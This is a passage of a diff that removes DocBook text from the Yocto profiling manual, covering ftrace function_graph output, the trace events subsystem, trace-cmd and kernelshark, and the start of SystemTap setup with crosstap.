-     root@sugarbay:/sys/kernel/debug/tracing# echo function_graph &gt; current_tracer
-     root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
-
-      tracer: function_graph
-
-      CPU  DURATION                  FUNCTION CALLS
-      |     |   |                     |   |   |   |
-     7)   0.046 us    |      pick_next_task_fair();
-     7)   0.043 us    |      pick_next_task_stop();
-     7)   0.042 us    |      pick_next_task_rt();
-     7)   0.032 us    |      pick_next_task_fair();
-     7)   0.030 us    |      pick_next_task_idle();
-     7)               |      _raw_spin_unlock_irq() {
-     7)   0.033 us    |        sub_preempt_count();
-     7)   0.258 us    |      }
-     7)   0.032 us    |      sub_preempt_count();
-     7) + 13.341 us   |    } /* __schedule */
-     7)   0.095 us    |  } /* sub_preempt_count */
-     7)               |  schedule() {
-     7)               |    __schedule() {
-     7)   0.060 us    |      add_preempt_count();
-     7)   0.044 us    |      rcu_note_context_switch();
-     7)               |      _raw_spin_lock_irq() {
-     7)   0.033 us    |        add_preempt_count();
-     7)   0.247 us    |      }
-     7)               |      idle_balance() {
-     7)               |        _raw_spin_unlock() {
-     7)   0.031 us    |          sub_preempt_count();
-     7)   0.246 us    |        }
-     7)               |        update_shares() {
-     7)   0.030 us    |          __rcu_read_lock();
-     7)   0.029 us    |          __rcu_read_unlock();
-     7)   0.484 us    |        }
-     7)   0.030 us    |        __rcu_read_lock();
-     7)               |        load_balance() {
-     7)               |          find_busiest_group() {
-     7)   0.031 us    |            idle_cpu();
-     7)   0.029 us    |            idle_cpu();
-     7)   0.035 us    |            idle_cpu();
-     7)   0.906 us    |          }
-     7)   1.141 us    |        }
-     7)   0.022 us    |        msecs_to_jiffies();
-     7)               |        load_balance() {
-     7)               |          find_busiest_group() {
-     7)   0.031 us    |            idle_cpu();
-     .
-     .
-     .
-     4)   0.062 us    |        msecs_to_jiffies();
-     4)   0.062 us    |        __rcu_read_unlock();
-     4)               |        _raw_spin_lock() {
-     4)   0.073 us    |          add_preempt_count();
-     4)   0.562 us    |        }
-     4) + 17.452 us   |      }
-     4)   0.108 us    |      put_prev_task_fair();
-     4)   0.102 us    |      pick_next_task_fair();
-     4)   0.084 us    |      pick_next_task_stop();
-     4)   0.075 us    |      pick_next_task_rt();
-     4)   0.062 us    |      pick_next_task_fair();
-     4)   0.066 us    |      pick_next_task_idle();
-     ------------------------------------------
-     4)   kworker-74   =&gt;    &lt;idle&gt;-0
-     ------------------------------------------
-
-     4)               |      finish_task_switch() {
-     4)               |        _raw_spin_unlock_irq() {
-     4)   0.100 us    |          sub_preempt_count();
-     4)   0.582 us    |        }
-     4)   1.105 us    |      }
-     4)   0.088 us    |      sub_preempt_count();
-     4) ! 100.066 us  |    }
-     .
-     .
-     .
-     3)               |  sys_ioctl() {
-     3)   0.083 us    |    fget_light();
-     3)               |    security_file_ioctl() {
-     3)   0.066 us    |      cap_file_ioctl();
-     3)   0.562 us    |    }
-     3)               |    do_vfs_ioctl() {
-     3)               |      drm_ioctl() {
-     3)   0.075 us    |        drm_ut_debug_printk();
-     3)               |        i915_gem_pwrite_ioctl() {
-     3)               |          i915_mutex_lock_interruptible() {
-     3)   0.070 us    |            mutex_lock_interruptible();
-     3)   0.570 us    |          }
-     3)               |          drm_gem_object_lookup() {
-     3)               |            _raw_spin_lock() {
-     3)   0.080 us    |              add_preempt_count();
-     3)   0.620 us    |            }
-     3)               |            _raw_spin_unlock() {
-     3)   0.085 us    |              sub_preempt_count();
-     3)   0.562 us    |            }
-     3)   2.149 us    |          }
-     3)   0.133 us    |          i915_gem_object_pin();
-     3)               |          i915_gem_object_set_to_gtt_domain() {
-     3)   0.065 us    |            i915_gem_object_flush_gpu_write_domain();
-     3)   0.065 us    |            i915_gem_object_wait_rendering();
-     3)   0.062 us    |            i915_gem_object_flush_cpu_write_domain();
-     3)   1.612 us    |          }
-     3)               |          i915_gem_object_put_fence() {
-     3)   0.097 us    |            i915_gem_object_flush_fence.constprop.36();
-     3)   0.645 us    |          }
-     3)   0.070 us    |          add_preempt_count();
-     3)   0.070 us    |          sub_preempt_count();
-     3)   0.073 us    |          i915_gem_object_unpin();
-     3)   0.068 us    |          mutex_unlock();
-     3)   9.924 us    |        }
-     3) + 11.236 us   |      }
-     3) + 11.770 us   |    }
-     3) + 13.784 us   |  }
-     3)               |  sys_ioctl() {
-            </literallayout>
-            As you can see, the function_graph display is much easier to
-            follow. Also note that in addition to the function calls and
-            associated braces, other events such as scheduler events
-            are displayed in context. In fact, you can freely include
-            any tracepoint available in the trace events subsystem described
-            in the next section by simply enabling those events, and they'll
-            appear in context in the function graph display. Quite a
-            powerful tool for understanding kernel dynamics.
-        </para>
-
-        <para>
-            Also notice that there are various annotations on the left
-            hand side of the display. For example if the total time it
-            took for a given function to execute is above a certain
-            threshold, an exclamation point or plus sign appears on the
-            left hand side. Please see the ftrace documentation for
-            details on all these fields.
-        </para>
-    </section>
-
-    <section id='the-trace-events-subsystem'>
-        <title>The 'trace events' Subsystem</title>
-
-        <para>
-            One especially important directory contained within
-            the /sys/kernel/debug/tracing directory is the 'events'
-            subdirectory, which contains representations of every
-            tracepoint in the system. Listing out the contents of
-            the 'events' subdirectory, we see mainly another set of
-            subdirectories:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# cd events
-     root@sugarbay:/sys/kernel/debug/tracing/events# ls -al
-     drwxr-xr-x   38 root     root             0 Nov 14 23:19 .
-     drwxr-xr-x    5 root     root             0 Nov 14 23:19 ..
-     drwxr-xr-x   19 root     root             0 Nov 14 23:19 block
-     drwxr-xr-x   32 root     root             0 Nov 14 23:19 btrfs
-     drwxr-xr-x    5 root     root             0 Nov 14 23:19 drm
-     -rw-r--r--    1 root     root             0 Nov 14 23:19 enable
-     drwxr-xr-x   40 root     root             0 Nov 14 23:19 ext3
-     drwxr-xr-x   79 root     root             0 Nov 14 23:19 ext4
-     drwxr-xr-x   14 root     root             0 Nov 14 23:19 ftrace
-     drwxr-xr-x    8 root     root             0 Nov 14 23:19 hda
-     -r--r--r--    1 root     root             0 Nov 14 23:19 header_event
-     -r--r--r--    1 root     root             0 Nov 14 23:19 header_page
-     drwxr-xr-x   25 root     root             0 Nov 14 23:19 i915
-     drwxr-xr-x    7 root     root             0 Nov 14 23:19 irq
-     drwxr-xr-x   12 root     root             0 Nov 14 23:19 jbd
-     drwxr-xr-x   14 root     root             0 Nov 14 23:19 jbd2
-     drwxr-xr-x   14 root     root             0 Nov 14 23:19 kmem
-     drwxr-xr-x    7 root     root             0 Nov 14 23:19 module
-     drwxr-xr-x    3 root     root             0 Nov 14 23:19 napi
-     drwxr-xr-x    6 root     root             0 Nov 14 23:19 net
-     drwxr-xr-x    3 root     root             0 Nov 14 23:19 oom
-     drwxr-xr-x   12 root     root             0 Nov 14 23:19 power
-     drwxr-xr-x    3 root     root             0 Nov 14 23:19 printk
-     drwxr-xr-x    8 root     root             0 Nov 14 23:19 random
-     drwxr-xr-x    4 root     root             0 Nov 14 23:19 raw_syscalls
-     drwxr-xr-x    3 root     root             0 Nov 14 23:19 rcu
-     drwxr-xr-x    6 root     root             0 Nov 14 23:19 rpm
-     drwxr-xr-x   20 root     root             0 Nov 14 23:19 sched
-     drwxr-xr-x    7 root     root             0 Nov 14 23:19 scsi
-     drwxr-xr-x    4 root     root             0 Nov 14 23:19 signal
-     drwxr-xr-x    5 root     root             0 Nov 14 23:19 skb
-     drwxr-xr-x    4 root     root             0 Nov 14 23:19 sock
-     drwxr-xr-x   10 root     root             0 Nov 14 23:19 sunrpc
-     drwxr-xr-x  538 root     root             0 Nov 14 23:19 syscalls
-     drwxr-xr-x    4 root     root             0 Nov 14 23:19 task
-     drwxr-xr-x   14 root     root             0 Nov 14 23:19 timer
-     drwxr-xr-x    3 root     root             0 Nov 14 23:19 udp
-     drwxr-xr-x   21 root     root             0 Nov 14 23:19 vmscan
-     drwxr-xr-x    3 root     root             0 Nov 14 23:19 vsyscall
-     drwxr-xr-x    6 root     root             0 Nov 14 23:19 workqueue
-     drwxr-xr-x   26 root     root             0 Nov 14 23:19 writeback
-            </literallayout>
-            Each one of these subdirectories corresponds to a
-            'subsystem' and contains yet again more subdirectories,
-            each one of those finally corresponding to a tracepoint.
-            For example, here are the contents of the 'kmem' subsystem:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing/events# cd kmem
-     root@sugarbay:/sys/kernel/debug/tracing/events/kmem# ls -al
-     drwxr-xr-x   14 root     root             0 Nov 14 23:19 .
-     drwxr-xr-x   38 root     root             0 Nov 14 23:19 ..
-     -rw-r--r--    1 root     root             0 Nov 14 23:19 enable
-     -rw-r--r--    1 root     root             0 Nov 14 23:19 filter
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 kfree
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmalloc
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmalloc_node
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmem_cache_alloc
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmem_cache_alloc_node
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 kmem_cache_free
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_alloc
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_alloc_extfrag
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_alloc_zone_locked
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_free
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_free_batched
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 mm_page_pcpu_drain
-            </literallayout>
-            Let's see what's inside the subdirectory for a specific
-            tracepoint, in this case the one for kmalloc:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing/events/kmem# cd kmalloc
-     root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# ls -al
-     drwxr-xr-x    2 root     root             0 Nov 14 23:19 .
-     drwxr-xr-x   14 root     root             0 Nov 14 23:19 ..
-     -rw-r--r--    1 root     root             0 Nov 14 23:19 enable
-     -rw-r--r--    1 root     root             0 Nov 14 23:19 filter
-     -r--r--r--    1 root     root             0 Nov 14 23:19 format
-     -r--r--r--    1 root     root             0 Nov 14 23:19 id
-            </literallayout>
-            The 'format' file for the tracepoint describes the event
-            in memory, which is used by the various tracing tools
-            that now make use of these tracepoint to parse the event
-            and make sense of it, along with a 'print fmt' field that
-            allows tools like ftrace to display the event as text.
-            Here's what the format of the kmalloc event looks like:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# cat format
-     name: kmalloc
-     ID: 313
-     format:
-	     field:unsigned short common_type;	offset:0;	size:2;	signed:0;
-	     field:unsigned char common_flags;	offset:2;	size:1;	signed:0;
-	     field:unsigned char common_preempt_count;	offset:3;	size:1;	signed:0;
-	     field:int common_pid;	offset:4;	size:4;	signed:1;
-	     field:int common_padding;	offset:8;	size:4;	signed:1;
-
-	     field:unsigned long call_site;	offset:16;	size:8;	signed:0;
-	     field:const void * ptr;	offset:24;	size:8;	signed:0;
-	     field:size_t bytes_req;	offset:32;	size:8;	signed:0;
-	     field:size_t bytes_alloc;	offset:40;	size:8;	signed:0;
-	     field:gfp_t gfp_flags;	offset:48;	size:4;	signed:0;
-
-     print fmt: "call_site=%lx ptr=%p bytes_req=%zu bytes_alloc=%zu gfp_flags=%s", REC->call_site, REC->ptr, REC->bytes_req, REC->bytes_alloc,
-     (REC->gfp_flags) ? __print_flags(REC->gfp_flags, "|", {(unsigned long)(((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
-     gfp_t)0x20000u) | (( gfp_t)0x02u) | (( gfp_t)0x08u)) | (( gfp_t)0x4000u) | (( gfp_t)0x10000u) | (( gfp_t)0x1000u) | (( gfp_t)0x200u) | ((
-     gfp_t)0x400000u)), "GFP_TRANSHUGE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x20000u) | ((
-     gfp_t)0x02u) | (( gfp_t)0x08u)), "GFP_HIGHUSER_MOVABLE"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
-     gfp_t)0x20000u) | (( gfp_t)0x02u)), "GFP_HIGHUSER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | ((
-     gfp_t)0x20000u)), "GFP_USER"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u) | (( gfp_t)0x80000u)), GFP_TEMPORARY"},
-     {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u) | (( gfp_t)0x80u)), "GFP_KERNEL"}, {(unsigned long)((( gfp_t)0x10u) | (( gfp_t)0x40u)),
-     "GFP_NOFS"}, {(unsigned long)((( gfp_t)0x20u)), "GFP_ATOMIC"}, {(unsigned long)((( gfp_t)0x10u)), "GFP_NOIO"}, {(unsigned long)((
-     gfp_t)0x20u), "GFP_HIGH"}, {(unsigned long)(( gfp_t)0x10u), "GFP_WAIT"}, {(unsigned long)(( gfp_t)0x40u), "GFP_IO"}, {(unsigned long)((
-     gfp_t)0x100u), "GFP_COLD"}, {(unsigned long)(( gfp_t)0x200u), "GFP_NOWARN"}, {(unsigned long)(( gfp_t)0x400u), "GFP_REPEAT"}, {(unsigned
-     long)(( gfp_t)0x800u), "GFP_NOFAIL"}, {(unsigned long)(( gfp_t)0x1000u), "GFP_NORETRY"},      {(unsigned long)(( gfp_t)0x4000u), "GFP_COMP"},
-     {(unsigned long)(( gfp_t)0x8000u), "GFP_ZERO"}, {(unsigned long)(( gfp_t)0x10000u), "GFP_NOMEMALLOC"}, {(unsigned long)(( gfp_t)0x20000u),
-     "GFP_HARDWALL"}, {(unsigned long)(( gfp_t)0x40000u), "GFP_THISNODE"}, {(unsigned long)(( gfp_t)0x80000u), "GFP_RECLAIMABLE"}, {(unsigned
-     long)(( gfp_t)0x08u), "GFP_MOVABLE"}, {(unsigned long)(( gfp_t)0), "GFP_NOTRACK"}, {(unsigned long)(( gfp_t)0x400000u), "GFP_NO_KSWAPD"},
-     {(unsigned long)(( gfp_t)0x800000u), "GFP_OTHER_NODE"} ) : "GFP_NOWAIT"
-            </literallayout>
-            The 'enable' file in the tracepoint directory is what allows
-            the user (or tools such as trace-cmd) to actually turn the
-            tracepoint on and off. When enabled, the corresponding
-            tracepoint will start appearing in the ftrace 'trace'
-            file described previously. For example, this turns on the
-            kmalloc tracepoint:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 1 > enable
-            </literallayout>
-            At the moment, we're not interested in the function tracer or
-            some other tracer that might be in effect, so we first turn
-            it off, but if we do that, we still need to turn tracing on in
-            order to see the events in the output buffer:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# echo nop > current_tracer
-     root@sugarbay:/sys/kernel/debug/tracing# echo 1 > tracing_on
-            </literallayout>
-            Now, if we look at the the 'trace' file, we see nothing
-            but the kmalloc events we just turned on:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing# cat trace | less
-     # tracer: nop
-     #
-     # entries-in-buffer/entries-written: 1897/1897   #P:8
-     #
-     #                              _-----=&gt; irqs-off
-     #                             / _----=&gt; need-resched
-     #                            | / _---=&gt; hardirq/softirq
-     #                            || / _--=&gt; preempt-depth
-     #                            ||| /     delay
-     #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
-     #              | |       |   ||||       |         |
-            dropbear-1465  [000] ...1 18154.620753: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
-              &lt;idle&gt;-0     [000] ..s3 18154.621640: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-              &lt;idle&gt;-0     [000] ..s3 18154.621656: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-     matchbox-termin-1361  [001] ...1 18154.755472: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f0e00 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
-                Xorg-1264  [002] ...1 18154.755581: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
-                Xorg-1264  [002] ...1 18154.755583: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
-                Xorg-1264  [002] ...1 18154.755589: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
-     matchbox-termin-1361  [001] ...1 18155.354594: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db35400 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
-                Xorg-1264  [002] ...1 18155.354703: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
-                Xorg-1264  [002] ...1 18155.354705: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
-                Xorg-1264  [002] ...1 18155.354711: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
-              &lt;idle&gt;-0     [000] ..s3 18155.673319: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-            dropbear-1465  [000] ...1 18155.673525: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
-              &lt;idle&gt;-0     [000] ..s3 18155.674821: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-              &lt;idle&gt;-0     [000] ..s3 18155.793014: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-            dropbear-1465  [000] ...1 18155.793219: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
-              &lt;idle&gt;-0     [000] ..s3 18155.794147: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-              &lt;idle&gt;-0     [000] ..s3 18155.936705: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-            dropbear-1465  [000] ...1 18155.936910: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
-              &lt;idle&gt;-0     [000] ..s3 18155.937869: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-     matchbox-termin-1361  [001] ...1 18155.953667: kmalloc: call_site=ffffffff81614050 ptr=ffff88006d5f2000 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_KERNEL|GFP_REPEAT
-                Xorg-1264  [002] ...1 18155.953775: kmalloc: call_site=ffffffff8141abe8 ptr=ffff8800734f4cc0 bytes_req=168 bytes_alloc=192 gfp_flags=GFP_KERNEL|GFP_NOWARN|GFP_NORETRY
-                Xorg-1264  [002] ...1 18155.953777: kmalloc: call_site=ffffffff814192a3 ptr=ffff88001f822520 bytes_req=24 bytes_alloc=32 gfp_flags=GFP_KERNEL|GFP_ZERO
-                Xorg-1264  [002] ...1 18155.953783: kmalloc: call_site=ffffffff81419edb ptr=ffff8800721a2f00 bytes_req=64 bytes_alloc=64 gfp_flags=GFP_KERNEL|GFP_ZERO
-              &lt;idle&gt;-0     [000] ..s3 18156.176053: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-            dropbear-1465  [000] ...1 18156.176257: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
-              &lt;idle&gt;-0     [000] ..s3 18156.177717: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-              &lt;idle&gt;-0     [000] ..s3 18156.399229: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d555800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-            dropbear-1465  [000] ...1 18156.399434: kmalloc: call_site=ffffffff816650d4 ptr=ffff8800729c3000 bytes_http://rostedt.homelinux.com/kernelshark/req=2048 bytes_alloc=2048 gfp_flags=GFP_KERNEL
-              &lt;idle&gt;-0     [000] ..s3 18156.400660: kmalloc: call_site=ffffffff81619b36 ptr=ffff88006d554800 bytes_req=512 bytes_alloc=512 gfp_flags=GFP_ATOMIC
-     matchbox-termin-1361  [001] ...1 18156.552800: kmalloc: call_site=ffffffff81614050 ptr=ffff88006db34800 bytes_req=576 bytes_alloc=1024 gfp_flags=GFP_KERNEL|GFP_REPEAT
-            </literallayout>
-            To again disable the kmalloc event, we need to send 0 to the
-            enable file:
-            <literallayout class='monospaced'>
-     root@sugarbay:/sys/kernel/debug/tracing/events/kmem/kmalloc# echo 0 > enable
-            </literallayout>
-            You can enable any number of events or complete subsystems
-            (by using the 'enable' file in the subsystem directory) and
-            get an arbitrarily fine-grained idea of what's going on in the
-            system by enabling as many of the appropriate tracepoints
-            as applicable.
-        </para>
-
-        <para>
-            A number of the tools described in this HOWTO do just that,
-            including trace-cmd and kernelshark in the next section.
-        </para>
-
-        <informalexample>
-            <emphasis>Tying it Together:</emphasis> These tracepoints and their representation
-            are used not only by ftrace,  but by many of the other tools
-            covered in this document and they form a central point of
-            integration for the various tracers available in Linux.
-            They form a central part of the instrumentation for the
-            following tools: perf, lttng, ftrace, blktrace and SystemTap
-        </informalexample>
-
-        <informalexample>
-            <emphasis>Tying it Together:</emphasis> Eventually all the special-purpose tracers
-            currently available in /sys/kernel/debug/tracing will be
-            removed and replaced with equivalent tracers based on the
-            'trace events' subsystem.
-        </informalexample>
-    </section>
-
-    <section id='trace-cmd-kernelshark'>
-        <title>trace-cmd/kernelshark</title>
-
-        <para>
-            trace-cmd is essentially an extensive command-line 'wrapper'
-            interface that hides the details of all the individual files
-            in /sys/kernel/debug/tracing, allowing users to specify
-            specific particular events within the
-            /sys/kernel/debug/tracing/events/ subdirectory and to collect
-            traces and avoid having to deal with those details directly.
-        </para>
-
-        <para>
-            As yet another layer on top of that, kernelshark provides a GUI
-            that allows users to start and stop traces and specify sets
-            of events using an intuitive interface, and view the
-            output as both trace events and as a per-CPU graphical
-            display. It directly uses 'trace-cmd' as the plumbing
-            that accomplishes all that underneath the covers (and
-            actually displays the trace-cmd command it uses, as we'll see).
-        </para>
-
-        <para>
-            To start a trace using kernelshark, first start kernelshark:
-            <literallayout class='monospaced'>
-     root@sugarbay:~# kernelshark
-            </literallayout>
-            Then bring up the 'Capture' dialog by choosing from the
-            kernelshark menu:
-            <literallayout class='monospaced'>
-     Capture | Record
-            </literallayout>
-            That will display the following dialog, which allows you to
-            choose one or more events (or even one or more complete
-            subsystems) to trace:
-        </para>
-
-        <para>
-            <imagedata fileref="figures/kernelshark-choose-events.png" width="6in" depth="6in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            Note that these are exactly the same sets of events described
-            in the previous trace events subsystem section, and in fact
-            is where trace-cmd gets them for kernelshark.
-        </para>
-
-        <para>
-            In the above screenshot, we've decided to explore the
-            graphics subsystem a bit and so have chosen to trace all
-            the tracepoints contained within the 'i915' and 'drm'
-            subsystems.
-        </para>
-
-        <para>
-            After doing that, we can start and stop the trace using
-            the 'Run' and 'Stop' button on the lower right corner of
-            the dialog (the same button will turn into the 'Stop'
-            button after the trace has started):
-        </para>
-
-        <para>
-            <imagedata fileref="figures/kernelshark-output-display.png" width="6in" depth="6in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            Notice that the right-hand pane shows the exact trace-cmd
-            command-line that's used to run the trace, along with the
-            results of the trace-cmd run.
-        </para>
-
-        <para>
-            Once the 'Stop' button is pressed, the graphical view magically
-            fills up with a colorful per-cpu display of the trace data,
-            along with the detailed event listing below that:
-        </para>
-
-        <para>
-            <imagedata fileref="figures/kernelshark-i915-display.png" width="6in" depth="7in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            Here's another example, this time a display resulting
-            from tracing 'all events':
-        </para>
-
-        <para>
-            <imagedata fileref="figures/kernelshark-all.png" width="6in" depth="7in" align="center" scalefit="1" />
-        </para>
-
-        <para>
-            The tool is pretty self-explanatory, but for more detailed
-            information on navigating through the data, see the
-            <ulink url='http://rostedt.homelinux.com/kernelshark/'>kernelshark website</ulink>.
-        </para>
-    </section>
-
-    <section id='ftrace-documentation'>
-        <title>Documentation</title>
-
-        <para>
-            The documentation for ftrace can be found in the kernel
-            Documentation directory:
-            <literallayout class='monospaced'>
-     Documentation/trace/ftrace.txt
-            </literallayout>
-            The documentation for the trace event subsystem can also
-            be found in the kernel Documentation directory:
-            <literallayout class='monospaced'>
-     Documentation/trace/events.txt
-            </literallayout>
-            There is a nice series of articles on using
-            ftrace and trace-cmd at LWN:
-            <itemizedlist>
-                <listitem><para><ulink url='http://lwn.net/Articles/365835/'>Debugging the kernel using Ftrace - part 1</ulink>
-                    </para></listitem>
-                <listitem><para><ulink url='http://lwn.net/Articles/366796/'>Debugging the kernel using Ftrace - part 2</ulink>
-                    </para></listitem>
-                <listitem><para><ulink url='http://lwn.net/Articles/370423/'>Secrets of the Ftrace function tracer</ulink>
-                    </para></listitem>
-                <listitem><para><ulink url='https://lwn.net/Articles/410200/'>trace-cmd: A front-end for Ftrace</ulink>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            There's more detailed documentation kernelshark usage here:
-            <ulink url='http://rostedt.homelinux.com/kernelshark/'>KernelShark</ulink>
-        </para>
-
-        <para>
-            An amusing yet useful README (a tracing mini-HOWTO) can be
-            found in /sys/kernel/debug/tracing/README.
-        </para>
-    </section>
-</section>
-
-<section id='profile-manual-systemtap'>
-    <title>systemtap</title>
-
-    <para>
-        SystemTap is a system-wide script-based tracing and profiling tool.
-    </para>
-
-    <para>
-        SystemTap scripts are C-like programs that are executed in the
-        kernel to gather/print/aggregate data extracted from the context
-        they end up being invoked under.
-    </para>
-
-    <para>
-        For example, this probe from the
-        <ulink url='http://sourceware.org/systemtap/tutorial/'>SystemTap tutorial</ulink>
-        simply prints a line every time any process on the system open()s
-        a file. For each line, it prints the executable name of the
-        program that opened the file, along with its PID, and the name
-        of the file it opened (or tried to open), which it extracts
-        from the open syscall's argstr.
-        <literallayout class='monospaced'>
-     probe syscall.open
-     {
-             printf ("%s(%d) open (%s)\n", execname(), pid(), argstr)
-     }
-
-     probe timer.ms(4000) # after 4 seconds
-     {
-             exit ()
-     }
-        </literallayout>
-        Normally, to execute this probe, you'd simply install
-        systemtap on the system you want to probe, and directly run
-        the probe on that system e.g. assuming the name of the file
-        containing the above text is trace_open.stp:
-        <literallayout class='monospaced'>
-     # stap trace_open.stp
-        </literallayout>
-        What systemtap does under the covers to run this probe is 1)
-        parse and convert the probe to an equivalent 'C' form, 2)
-        compile the 'C' form into a kernel module, 3) insert the
-        module into the kernel, which arms it, and 4) collect the data
-        generated by the probe and display it to the user.
-     </para>
-
-     <para>
-        In order to accomplish steps 1 and 2, the 'stap' program needs
-        access to the kernel build system that produced the kernel
-        that the probed system is running. In the case of a typical
-        embedded system (the 'target'), the kernel build system
-        unfortunately isn't typically part of the image running on
-        the target. It is normally available on the 'host' system
-        that produced the target image however; in such cases,
-        steps 1 and 2 are executed on the host system, and steps
-        3 and 4 are executed on the target system, using only the
-        systemtap 'runtime'.
-    </para>
-
-    <para>
-        The systemtap support in Yocto assumes that only steps
-        3 and 4 are run on the target; it is possible to do
-        everything on the target, but this section assumes only
-        the typical embedded use-case.
-    </para>
-
-    <para>
-        So basically what you need to do in order to run a systemtap
-        script on the target is to 1) on the host system, compile the
-        probe into a kernel module that makes sense to the target, 2)
-        copy the module onto the target system and 3) insert the
-        module into the target kernel, which arms it, and 4) collect
-        the data generated by the probe and display it to the user.
-    </para>
-
-    <section id='systemtap-setup'>
-        <title>Setup</title>
-
-        <para>
-            Those are a lot of steps and a lot of details, but
-            fortunately Yocto includes a script called 'crosstap'
-            that will take care of those details, allowing you to
-            simply execute a systemtap script on the remote target,
-            with arguments if necessary.
-        </para>
-
-        <para>
-            In order to do this from a remote host, however, you
-            need to have access to the build for the image you
-            booted. The 'crosstap' script provides details on how
-            to do this if you run the script on the host without having
-            done a build:
-            <note>
-                SystemTap, which uses 'crosstap', assumes you can establish an
-                ssh connection to the remote target.
-                Please refer to the crosstap wiki page for details on verifying
-                ssh connections at
